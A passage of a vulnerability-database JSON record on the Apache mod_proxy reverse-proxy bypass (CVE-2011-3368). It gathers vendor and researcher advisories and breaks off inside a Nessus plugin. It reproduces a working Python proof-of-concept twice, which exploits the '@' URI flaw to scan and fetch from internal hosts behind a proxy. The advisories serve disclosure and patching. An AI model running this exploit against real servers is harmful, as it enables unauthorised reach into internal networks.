mes5/i586/apache-mod_proxy_ajp-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 9ccb5fbad8be4a8b854202f61bbff404 mes5/i586/apache-mod_ssl-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 90b0eaa590c9ef3384d9d510b02acb0a mes5/i586/apache-modules-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 139ec8c7604ff186d9a5f7211cf153e2 mes5/i586/apache-mod_userdir-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 427d203744147b131faacaeda85d0c33 mes5/i586/apache-mpm-event-2.2.9-12.13mdvmes5.2.i586.rpm\r\n f05074badc58876520876f4c5030f65e mes5/i586/apache-mpm-itk-2.2.9-12.13mdvmes5.2.i586.rpm\r\n 218eb230875cef887a298886add841c5 mes5/i586/apache-mpm-peruser-2.2.9-12.13mdvmes5.2.i586.rpm\r\n b18ac1117a837c0a01b0214d34914d33 mes5/i586/apache-mpm-prefork-2.2.9-12.13mdvmes5.2.i586.rpm\r\n a61b60d3ed2d40ca20154a7720d5d700 mes5/i586/apache-mpm-worker-2.2.9-12.13mdvmes5.2.i586.rpm\r\n ba799d2f8a25748d0222ca5c22b8d77b mes5/i586/apache-source-2.2.9-12.13mdvmes5.2.i586.rpm \r\n 805742aa36cff750b99f31e180fd867d mes5/SRPMS/apache-2.2.9-12.13mdvmes5.2.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n fc201c9261c712da3f289e9b4027a5fc mes5/x86_64/apache-base-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 5525b60c6cfba84feed38edf06e2e246 mes5/x86_64/apache-devel-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 216f7afebeabd44b1fe3177b909bb169 mes5/x86_64/apache-htcacheclean-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 6e113f9a73cfef3c205e15b7ab5d9c09 mes5/x86_64/apache-mod_authn_dbd-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 6811ceefa8472b1af410f79262ec4fb6 mes5/x86_64/apache-mod_cache-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n ff747be8f132abad9629bda68dffba20 mes5/x86_64/apache-mod_dav-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n d36b00c90f690ca783ed1af88bfd07e2 mes5/x86_64/apache-mod_dbd-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 121ed1fef89fafed42538714a0c91742 mes5/x86_64/apache-mod_deflate-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 680c3c57565fa6937f1bd436461cf013 mes5/x86_64/apache-mod_disk_cache-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n b2c008438014163937dc4a4951d6f145 mes5/x86_64/apache-mod_file_cache-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 149fd8345aec9b63304643717c4e3aa0 mes5/x86_64/apache-mod_ldap-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n e549c5dd75bee4df39e9c947e0724b71 mes5/x86_64/apache-mod_mem_cache-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 784137d1caaaa974db42e54e0cbbc621 mes5/x86_64/apache-mod_proxy-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n c6dea61e1b6f8a2373741af10a9bf72a mes5/x86_64/apache-mod_proxy_ajp-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 92e34c8dbeac34258a527dead2c362e9 mes5/x86_64/apache-mod_ssl-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n c4780606189970462d0e7063fcc356ae mes5/x86_64/apache-modules-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 78bad1842ce68bf2a0c1fcf75a6805a2 mes5/x86_64/apache-mod_userdir-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 29db775ba6d750c955f70ea7d8e21bed mes5/x86_64/apache-mpm-event-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 34ba6c4d7e9f0a31cc010df6d97882c3 mes5/x86_64/apache-mpm-itk-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n b4b3ac445b8cb6bb3aaed1cad0756efc mes5/x86_64/apache-mpm-peruser-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n fc138aec05894dc918ac1a2cd93731d2 mes5/x86_64/apache-mpm-prefork-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n 5a1dcd551d4f49a39c76a1b1de709bd5 mes5/x86_64/apache-mpm-worker-2.2.9-12.13mdvmes5.2.x86_64.rpm\r\n c1908c1a28f94c61d3aced3485b64f73 mes5/x86_64/apache-source-2.2.9-12.13mdvmes5.2.x86_64.rpm \r\n 805742aa36cff750b99f31e180fd867d mes5/SRPMS/apache-2.2.9-12.13mdvmes5.2.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFOkBbQmqjQ0CJFipgRAnX4AKCegRXuoI4BSRlF/fpDsy5pYNVAgACeJKh2\r\nXA5J3HXCFMVungHV4GyLHwQ=\r\n=k57D\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2011-10-12T00:00:00", "published": "2011-10-12T00:00:00", "id": "SECURITYVULNS:DOC:27148", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27148", "title": "[ MDVSA-2011:144 ] apache", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-4317", "CVE-2011-3368"], "description": "Invalid processing for URI with preceeding @ sign.", "edition": 1, "modified": "2012-01-11T00:00:00", "published": "2012-01-11T00:00:00", "id": "SECURITYVULNS:VULN:11968", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11968", "title": "Apache mod_proxy unauthorized internal network access", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:46", "bulletinFamily": "software", "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "description": "Information leakage, filtering bypass, privilege escalation, DoS.", "edition": 1, "modified": "2012-02-03T00:00:00", "published": "2012-02-03T00:00:00", "id": "SECURITYVULNS:VULN:12166", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12166", "title": "Apache multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:44", "description": "", "published": "2011-10-06T00:00:00", "type": "packetstorm", "title": "Apache Reverse Proxy Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-06T00:00:00", "id": "PACKETSTORM:105591", "href": "https://packetstormsecurity.com/files/105591/Apache-Reverse-Proxy-Bypass.html", "sourceData": "`===============================ADVISORY============================== \nSystems Affected: Apache httpd \nSeverity: High \nCategory: Proxy Bypass \nAuthor: Context Information Security Ltd \nReported to vendor: 16th November 2011 \nAdvisory Issued: 5th October 2011 \nReference: CVE-2011-3368 \n===============================ADVISORY============================== \n \nDescription \n----------- \nContext discovered a security vulnerability which allows for Apache in reverse proxy mode to be used to access internal/DMZ systems due to a weakness in its handling of URLs being processed by mod_rewrite. \n \nAnalysis \n-------- \nIf the Apache configuration file is configured as follows (as previously recommended by Apache): \n \nRewriteRule ^(.*) http://internalserver$1 [P] \n \nAnd not with a trailing slash: \n \nRewriteRule ^(.*) http://internalserver/$1 [P] \n \nThen a request can be made to the proxy server to alter the URL using the user authentication URI syntax, such as: \n \nGET @InternalNotAccessibleServer/console HTTP/1.0 \n \nCausing the proxy to rewrite the URL to: \n \nhttp://internalserver@InternalNotAccessibleServer/console \n \nAnd provide access to the internal server which is not externally accessible. \n \nFor an in-depth analysis of this security issue read Context\u0092s blog at: \nhttp://www.contextis.com/research/blog/reverseproxybypass/ \n \nTechnologies Affected \n--------------------- \n \nApache httpd 1.3 all versions \nApache httpd 2.x all versions \n \n \n \nVendor Response \n--------------- \nApache have released a patch for this issue but recommend configuration files are reviewed. \nPatch available from: \nhttp://www.apache.org/dist/httpd/patches/apply_to_2.2.21/ \n \n \nDisclosure Timeline \n------------------- \n16th November 2011 \u0096 Vendor Notification \n5th October 2011 \u0096 Patch Released by Apache \n \n \nCredits \n-------- \nMichael Jordon and David Robinson of Context Information Security Ltd \n \n \nAbout Context Information Security \n---------------------------------- \n \nContext Information Security is an independent security consultancy specialising in both technical security and information assurance services. \n \nThe company was founded in 1998. Its client base has grown steadily over the years, thanks in large part to personal recommendations from existing clients who value us as business partners. We believe our success is based on the value our clients place on our product-agnostic, holistic approach; the way we work closely with them to develop a tailored service; and to the independence, integrity and technical skills of our consultants. \n \nThe company\u0092s client base now includes some of the most prestigious blue chip companies in the world, as well as government organisations. \n \nThe best security experts need to bring a broad portfolio of skills to the job, so Context has always sought to recruit staff with extensive business experience as well as technical expertise. Our aim is to provide effective and practical solutions, advice and support: when we report back to clients we always communicate our findings and recommendations in plain terms at a business level as well as in the form of an in-depth technical report. \n \nWeb: www.contextis.com \nEmail: disclosure@contextis.com \n \n \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/105591/context-apacheproxy.txt"}, {"lastseen": "2016-12-05T22:17:18", "description": "", "published": "2011-10-11T00:00:00", "type": "packetstorm", "title": "Apache mod_proxy Proof Of Concept", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-11T00:00:00", "id": "PACKETSTORM:105672", "href": "https://packetstormsecurity.com/files/105672/Apache-mod_proxy-Proof-Of-Concept.html", "sourceData": "`#!/usr/bin/env python \n \nimport socket \nimport string \nimport getopt, sys \n \n \nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080] \n \ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource): \n \nget = \"GET \" + url + \"@\" + internal_target + \":\" + internal_port + \"/\" + resource + \" HTTP/1.1\\r\\n\" \nget = get + \"Host: \" + apache_target + \"\\r\\n\\r\\n\" \n \nremoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nremoteserver.settimeout(3) \n \ntry: \nremoteserver.connect((apache_target, int(apache_port))) \nremoteserver.send(get) \nreturn remoteserver.recv(4096) \nexcept: \nreturn \"\" \n \ndef get_banner(result): \nreturn result[string.find(result, \"\\r\\n\\r\\n\")+4:] \n \n \ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource): \n \nprint_banner(url, apache_target, apache_port, internal_target, tested_ports, resource) \nfor port in tested_ports: \nport = str(port) \nresult = send_request(url, apache_target, apache_port, internal_target, port, resource) \nif string.find(result,\"HTTP/1.1 200\")!=-1 or \\ \nstring.find(result,\"HTTP/1.1 30\")!=-1 or \\ \nstring.find(result,\"HTTP/1.1 502\")!=-1: \nprint \"- Open port: \" + port + \"/TCP\" \nprint get_banner(result) \nelif len(result)==0: \nprint \"- Filtered port: \" + port + \"/TCP\" \nelse: \nprint \"- Closed port: \" + port + \"/TCP\" \n \n \ndef usage(): \nprint \nprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\" \nprint \"http://www.secforce.co.uk\" \nprint \nprint \"usage():\" \nprint \"python apache_scan.py [options]\" \nprint \nprint \" [options]\" \nprint \" -r: Remote Apache host\" \nprint \" -p: Remote Apache port (default is 80)\" \nprint \" -u: URL on the remote web server (default is /)\" \nprint \" -d: Host in the DMZ (default is 127.0.0.1)\" \nprint \" -e: Port in the DMZ (enables 'single port scan')\" \nprint \" -g: GET request to the host in the DMZ (default is /)\" \nprint \" -h: Help page\" \nprint \nprint \"examples:\" \nprint \" - Port scan of the remote host\" \nprint \" python apache_scan.py -r www.example.com -u /images/test.gif\" \nprint \" - Port scan of a host in the DMZ\" \nprint \" python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local\" \nprint \" - Retrieve a resource from a host in the DMZ\" \nprint \" python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html\" \nprint \n \ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource): \nprint \nprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\" \nprint \"http://www.secforce.co.uk\" \nprint \nprint \" [+] Target: \" + apache_target \nprint \" [+] Target port: \" + apache_port \nprint \" [+] Internal host: \" + internal_target \nprint \" [+] Tested ports: \" + str(tested_ports) \nprint \" [+] Internal resource: \" + resource \nprint \n \n \ndef main(): \n \nglobal apache_target \nglobal apache_port \nglobal url \nglobal internal_target \nglobal internal_port \nglobal resource \n \ntry: \nopts, args = getopt.getopt(sys.argv[1:], \"u:r:p:d:e:g:h\", [\"help\"]) \nexcept getopt.GetoptError: \nusage() \nsys.exit(2) \n \ntry: \nfor o, a in opts: \nif o in (\"-h\", \"--help\"): \nusage() \nsys.exit(2) \nif o == \"-u\": \nurl=a \nif o == \"-r\": \napache_target=a \nif o == \"-p\": \napache_port=a \nif o == \"-d\": \ninternal_target = a \nif o == \"-e\": \ninternal_port=a \nif o == \"-g\": \nresource=a \n \nexcept getopt.GetoptError: \nusage() \nsys.exit(2) \n \nif apache_target == \"\": \nusage() \nsys.exit(2) \n \n \nurl = \"/\" \napache_target = \"\" \napache_port = \"80\" \ninternal_target = \"127.0.0.1\" \ninternal_port = \"\" \nresource = \"/\" \n \nmain() \n \nif internal_port!=\"\": \ntested_ports = [internal_port] \nelse: \ntested_ports = known_ports \n \nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource) \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/105672/apache_proxy_scanner.py.txt"}], "seebug": [{"lastseen": "2017-11-19T17:59:00", "description": "Bugtraq ID: 49957\r\nCVE ID\uff1aCVE-2011-3368\r\n\r\nApache HTTP Server\u662f\u4e00\u6b3e\u5f00\u653e\u6e90\u4ee3\u7801\u7684HTTPD\u670d\u52a1\u7a0b\u5e8f\u3002\r\nApache HTTP Server mod_proxy\u6a21\u5757\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u6076\u610f\u7528\u6237\u7ed5\u8fc7\u90e8\u5206\u5b89\u5168\u9650\u5236\u3002\r\n\u5f53mod_proxy\u6a21\u5757\u914d\u7f6e\u4ee5\u53cd\u5411\u4ee3\u7406\u6a21\u5f0f\u65f6\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\uff0c\u7531\u4e8e\u4e0d\u6b63\u786e\u5904\u7406\u90e8\u5206WEB\u8bf7\u6c42\uff0c\u653b\u51fb\u8005\u6784\u5efa\u7279\u5236\u7684URL\u53ef\u5411\u4ee3\u7406\u540e\u7684\u4e0d\u53ef\u671f\u670d\u52a1\u5668\u53d1\u9001\u6076\u610f\u8bf7\u6c42\u3002\r\n\u8981\u6210\u529f\u5229\u7528\u6f0f\u6d1e\u9700\u8981\u4f7f\u7528\u5177\u6709\u4e00\u5b9a\u7684\u6a21\u5f0f\u5339\u914d\u7684&quot;ProxyPassMatch&quot;\u548c&quot;RewriteRule&quot;\u914d\u7f6e\u547d\u4ee4\u3002\n\nApache 2.0.x\r\nApache 2.2.x\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u4f9b\u5e94\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u8865\u4e01\uff1a\r\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.2.21/CVE-2011-3368.patch", "published": "2011-10-08T00:00:00", "title": "Apache HTTP Server 'mod_proxy'\u53cd\u5411\u4ee3\u7406\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20979", "id": "SSV:20979", "sourceData": "\n \u5982\u5982\u4e0b\u7684\u914d\u7f6e\uff1a\r\nRewriteRule (.*)\\.(jpg|gif|png) http://images.example.com$1.$2 [P]\r\nProxyPassMatch (.*)\\.(jpg|gif|png) http://images.example.com$1.$2\r\n\u53ef\u5bfc\u81f4\u6cc4\u9732\u5185\u90e8\u670d\u52a1\u5668\u4fe1\u606f\uff0c\u5982\u4e0b\u5f62\u5f0f\u7684\u8bf7\u6c42\uff1a\r\n GET @other.example.com/something.png HTTP/1.1\r\n \r\n\u4f1a\u8f6c\u8bd1\u6210\u5982\u4e0b\u7684\u76ee\u6807\u8bf7\u6c42\r\nhttp://images.example.com () other example com/something.png\r\n\u8fd9\u4f1a\u5bfc\u81f4\u4ee3\u7406\u8fde\u63a5&quot;other.example.com&quot;\uff0c\u56e0\u4e3a\u5f53\u89e3\u6790URL\u65f6&quot;images.example.com@&quot;\u6bb5\u4f1a\u4f5c\u4e3a\u7528\u6237\u9a8c\u8bc1\u51ed\u636e\u4f7f\u7528\u3002\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20979"}, {"lastseen": "2017-11-19T17:58:49", "description": "No description provided by source.", "published": "2011-10-12T00:00:00", "title": "Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20993", "id": "SSV:20993", "sourceData": "\n #!/usr/bin/env python\r\n \r\nimport socket\r\nimport string\r\nimport getopt, sys\r\n \r\n \r\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\r\n \r\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\r\n \r\n get = &quot;GET &quot; + url + &quot;@&quot; + internal_target + &quot;:&quot; + internal_port + &quot;/&quot; + resource + &quot; HTTP/1.1\\r\\n&quot;\r\n get = get + &quot;Host: &quot; + apache_target + &quot;\\r\\n\\r\\n&quot;\r\n \r\n remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n remoteserver.settimeout(3)\r\n \r\n try:\r\n remoteserver.connect((apache_target, int(apache_port)))\r\n remoteserver.send(get)\r\n return remoteserver.recv(4096)\r\n except:\r\n return &quot;&quot;\r\n \r\ndef get_banner(result):\r\n return result[string.find(result, &quot;\\r\\n\\r\\n&quot;)+4:]\r\n \r\n \r\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n \r\n print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n for port in tested_ports:\r\n port = str(port)\r\n result = send_request(url, apache_target, apache_port, internal_target, port, resource)\r\n if string.find(result,&quot;HTTP/1.1 200&quot;)!=-1 or \\\r\n string.find(result,&quot;HTTP/1.1 30&quot;)!=-1 or \\\r\n string.find(result,&quot;HTTP/1.1 502&quot;)!=-1:\r\n print &quot;- Open port: &quot; + port + &quot;/TCP&quot;\r\n print get_banner(result)\r\n elif len(result)==0:\r\n print &quot;- Filtered port: &quot; + port + &quot;/TCP&quot;\r\n else:\r\n print &quot;- Closed port: &quot; + port + &quot;/TCP&quot;\r\n \r\n \r\ndef usage():\r\n print\r\n print &quot;CVE-2011-3368 proof of concept by Rodrigo Marcos&quot;\r\n print &quot;http://www.secforce.co.uk&quot;\r\n print\r\n print &quot;usage():&quot;\r\n print &quot;python apache_scan.py [options]&quot;\r\n print\r\n print &quot; [options]&quot;\r\n print &quot; -r: Remote Apache host&quot;\r\n print &quot; -p: Remote Apache port (default is 80)&quot;\r\n print &quot; -u: URL on the remote web server (default is /)&quot;\r\n print &quot; -d: Host in the DMZ (default is 127.0.0.1)&quot;\r\n print &quot; -e: Port in the DMZ (enables 'single port scan')&quot;\r\n print &quot; -g: GET request to the host in the DMZ (default is /)&quot;\r\n print &quot; -h: Help page&quot;\r\n print\r\n print &quot;examples:&quot;\r\n print &quot; - Port scan of the remote host&quot;\r\n print &quot; python apache_scan.py -r www.example.com -u /images/test.gif&quot;\r\n print &quot; - Port scan of a host in the DMZ&quot;\r\n print &quot; python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local&quot;\r\n print &quot; - Retrieve a resource from a host in the DMZ&quot;\r\n print &quot; python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html&quot;\r\n print\r\n \r\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\r\n print\r\n print &quot;CVE-2011-3368 proof of concept by Rodrigo Marcos&quot;\r\n print &quot;http://www.secforce.co.uk&quot;\r\n print\r\n print &quot; [+] Target: &quot; + apache_target\r\n print &quot; [+] Target port: &quot; + apache_port\r\n print &quot; [+] Internal host: &quot; + internal_target\r\n print &quot; [+] Tested ports: &quot; + str(tested_ports)\r\n print &quot; [+] Internal resource: &quot; + resource\r\n print\r\n \r\n \r\ndef main():\r\n \r\n global apache_target\r\n global apache_port\r\n global url\r\n global internal_target\r\n global internal_port\r\n global resource\r\n \r\n try:\r\n opts, args = getopt.getopt(sys.argv[1:], &quot;u:r:p:d:e:g:h&quot;, [&quot;help&quot;])\r\n except getopt.GetoptError:\r\n usage()\r\n sys.exit(2)\r\n \r\n try:\r\n for o, a in opts:\r\n if o in (&quot;-h&quot;, &quot;--help&quot;):\r\n usage()\r\n sys.exit(2)\r\n if o == &quot;-u&quot;:\r\n url=a\r\n if o == &quot;-r&quot;:\r\n apache_target=a\r\n if o == &quot;-p&quot;:\r\n apache_port=a\r\n if o == &quot;-d&quot;:\r\n internal_target = a\r\n if o == &quot;-e&quot;:\r\n internal_port=a\r\n if o == &quot;-g&quot;:\r\n resource=a \r\n \r\n except getopt.GetoptError:\r\n usage()\r\n sys.exit(2)\r\n \r\n if apache_target == &quot;&quot;:\r\n usage()\r\n sys.exit(2)\r\n \r\n \r\nurl = &quot;/&quot;\r\napache_target = &quot;&quot;\r\napache_port = &quot;80&quot;\r\ninternal_target = &quot;127.0.0.1&quot;\r\ninternal_port = &quot;&quot;\r\nresource = &quot;/&quot;\r\n \r\nmain()\r\n \r\nif internal_port!=&quot;&quot;:\r\n tested_ports = [internal_port]\r\nelse:\r\n tested_ports = known_ports\r\n \r\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20993"}, {"lastseen": "2017-11-19T17:59:00", "description": "No description provided by source.", "published": "2011-10-06T00:00:00", "title": "Apache mod_proxy Reverse Proxy Exposure", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20969", "id": "SSV:20969", "sourceData": "\n -----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nApache HTTP Server Security Advisory\r\n====================================\r\n\r\nTitle: mod_proxy reverse proxy exposure\r\n\r\nCVE: CVE-2011-3368\r\nDate: 20111005\r\nProduct: Apache HTTP Server\r\nVersions: httpd 1.3 all versions, httpd 2.x all versions\r\n\r\nDescription:\r\n============\r\n\r\nAn exposure was reported affecting the use of Apache HTTP Server in\r\nreverse proxy mode. We would like to thank Context Information\r\nSecurity Ltd for reporting this issue to us.\r\n\r\nWhen using the RewriteRule or ProxyPassMatch directives to configure a\r\nreverse proxy using a pattern match, it is possible to inadvertently\r\nexpose internal servers to remote users who send carefully crafted\r\nrequests. The server did not validate that the input to the pattern\r\nmatch was a valid path string, so a pattern could expand to an\r\nunintended target URL.\r\n\r\nFor future releases of the Apache HTTP Server, the software will\r\nvalidate the request URI, correcting this specific vulnerability. The\r\ndocumentation has been updated to reflect the more general risks with\r\npattern matching in a reverse proxy configuration.\r\n\r\nDetails:\r\n========\r\n\r\nA configuration like one of the following examples:\r\n\r\n RewriteRule (.*)\\.(jpg|gif|png) http://images.example.com$1.$2 [P]\r\n ProxyPassMatch (.*)\\.(jpg|gif|png) http://images.example.com$1.$2\r\n\r\ncould result in an exposure of internal servers. A request of the form:\r\n\r\n GET @other.example.com/something.png HTTP/1.1\r\n\r\nwould get translated to a target of:\r\n\r\n http://images.example.com@other.example.com/something.png\r\n\r\nThis will cause the proxy to connect to the hostname\r\n&quot;other.example.com&quot;, as the &quot;images.example.com@&quot; segment would be\r\ntreated as user credentials when parsing the URL. This would allow a\r\nremote attacker the ability to proxy to hosts other than those\r\nexpected, which could be a security exposure in some circumstances.\r\n\r\nThe request-URI string in this example,\r\n&quot;@other.example.com/something.png&quot;, is not valid according to the HTTP\r\nspecification, since it neither an absolute URI\r\n(&quot;http://example.com/path&quot;) nor an absolute path (&quot;/path&quot;). For\r\nfuture releases, the server has been patched to reject such requests,\r\ninstead returning a &quot;400 Bad Request&quot; error.\r\n\r\nActions:\r\n========\r\n\r\nApache HTTPD users should examine their configuration files to determine \r\nif they have used an insecure configuration for reverse proxying. \r\nAffected users can update their configuration, or apply the patch from:\r\n\r\n http://www.apache.org/dist/httpd/patches/apply_to_2.2.21/\r\n\r\nFor example, the above RewriteRule could be changed to:\r\n\r\n RewriteRule /(.*)\\.(jpg|gif|png) http://images.example.com/$1.$2 [P]\r\n\r\nto ensure the pattern only matches against paths with a leading &quot;/&quot;.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niEYEARECAAYFAk6MZZAACgkQR/aWnQ5EzwxdfQCg0yX+OplatMPQcweRneRmh5Xp\r\n5sEAoLooi9H4LW12oPgStNbY2wtyQrYP\r\n=8qjg\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20969"}], "nessus": [{"lastseen": "2021-01-07T10:50:36", "description": "Apache HTTP server project reports :\n\nAn exposure was found when using mod_proxy in reverse proxy mode. In\ncertain configurations using RewriteRule with proxy flag, a remote\nattacker could cause the reverse proxy to connect to an arbitrary\nserver, possibly disclosing sensitive information from internal web\nservers not directly accessible to attacker. There is no patch against\nthis issue!", "edition": 25, "published": "2011-11-15T00:00:00", "title": "FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "modified": "2011-11-15T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache+mod_ssl+ipv6", "p-cpe:/a:freebsd:freebsd:apache+mod_perl", "p-cpe:/a:freebsd:freebsd:ru-apache+mod_ssl", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:apache+ipv6", "p-cpe:/a:freebsd:freebsd:ru-apache-1.3", "p-cpe:/a:freebsd:freebsd:apache+ssl", "p-cpe:/a:freebsd:freebsd:apache+mod_ssl", "p-cpe:/a:freebsd:freebsd:apache"], "id": "FREEBSD_PKG_D8C901FF0F0F11E1902B20CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/nessus/56816", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE 